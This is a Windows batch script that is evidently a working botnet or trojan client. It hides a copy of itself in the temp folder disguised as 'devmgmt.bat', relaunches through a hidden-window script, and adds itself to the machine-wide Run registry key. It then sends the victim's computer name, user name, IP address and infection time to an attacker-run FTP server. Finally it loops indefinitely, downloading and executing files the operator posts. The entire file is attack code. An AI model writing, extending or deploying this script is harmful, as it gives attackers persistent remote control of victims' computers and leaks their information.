@ECHO OFF
SETLOCAL ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
CD %TEMP%
IF NOT EXIST devmgmt.bat (
	COPY %0 "%TEMP%\devmgmt.bat" 
	ATTRIB +H "%TEMP%\devmgmt.bat"
	CMD /C devmgmt.bat
	GOTO :EOF
)
IF NOT [%1]==[] GOTO :%1
ECHO var WindowStyle_Hidden = 0 >Installer.js
ECHO var objShell = WScript.CreateObject("WScript.Shell")>>Installer.js
ECHO var result = objShell.Run("cmd.exe /c devmgmt.bat START", WindowStyle_Hidden)>>Installer.js
Installer.js
GOTO :EOF
:START
SET USERNME=FTP USERNAME GOES HERE
SET PASSWORD=FTP PASSWORD GOES HERE
SET SERVER=FTP SERVER GOES HERE
DEL Installer.js
NSLOOKUP>SETUP.DAT <NUL
SET STEP=1
FOR /F "delims=" %%E in (SETUP.DAT) DO (
	IF !STEP! EQU 2 (
		SET IP_LINE=%%E 
		SET IP=!IP_LINE:~10,12!
	)
	SET /A STEP+=1
)
REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Run /V devmgmt || GOTO NEW >NUL
GOTO LOOP
:NEW
SET NEW_TEMP=%TEMP%
SET NEW_TEMP=!NEW_TEMP:\=\\!
(
	ECHO Windows Registry Editor Version 5.00
	ECHO.
	ECHO [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
	ECHO "devmgmt"="!NEW_TEMP!\\devmgmt.bat"
)>"System.REG"
REGEDIT /S "System.REG"
(
	ECHO SET COMPUTER_NAME=%COMPUTERNAME%
	ECHO SET USER=%USERNAME%
	ECHO SET TIME_INFECTED=%TIME%
	ECHO SET DATE_INFECTED=%DATE%
	ECHO SET CPU=%PROCESSOR_ARCHITECTURE%
)>INFO.BAT
(
	ECHO USER !USERNME!
	ECHO !PASSWORD!
	ECHO BINARY
	ECHO GET SLAVES.DAT
	ECHO QUIT
)>SLAVE_UPL.UPL
FTP -n -s:SLAVE_UPL.UPL !SERVER!
SET IP_STEP=1
SET /P IP_AMOUNT=<SLAVES.DAT
FOR /F %%E IN (SLAVES.DAT) DO (
	SET STR=%%E
	IF !IP_STEP! EQU 1 (
		SET /A STR=!IP_AMOUNT!+1
	)
	ECHO !STR! >> SLAVES2.DAT
	SET /A IP_STEP+=1
)
ECHO !IP!>>SLAVES2.DAT
DEL SLAVES.DAT
REN SLAVES2.DAT SLAVES.DAT
(
	ECHO USER !USERNME!
	ECHO !PASSWORD!
	ECHO BINARY
	ECHO DELETE SLAVES.DAT
	ECHO PUT SLAVES.DAT
	ECHO MKDIR !IP!
	ECHO CD !IP!
	ECHO PUT INFO.BAT
	ECHO QUIT
)>INFO_UPL.UPL
FTP -n -s:INFO_UPL.UPL !SERVER!
DEL INFO.BAT
:LOOP
(
	ECHO USER !USERNME!
	ECHO !PASSWORD!
	ECHO BINARY
	ECHO CD !IP!
	ECHO DELETE CHECK.CHK
	ECHO GET EXEC.FILE
	ECHO QUIT
)>FILE.CHK
FTP -n -s:FILE.CHK !SERVER!
IF EXIST EXEC.FILE (
	SET /P FILE_EXT=<EXEC.FILE
	CALL :UPL
)
GOTO LOOP
:UPL
DEL EXEC!FILE_EXT!
(
	ECHO USER !USERNME!
	ECHO !PASSWORD!
	ECHO BINARY
	ECHO CD !IP!
	ECHO GET EXEC!FILE_EXT!
	ECHO DELETE EXEC!FILE_EXT!
	ECHO DELETE EXEC.FILE
	ECHO QUIT
)>EXEC.CHK
FTP -n -s:EXEC.CHK !SERVER!
START EXEC!FILE_EXT!
DEL EXEC.FILE
GOTO LOOP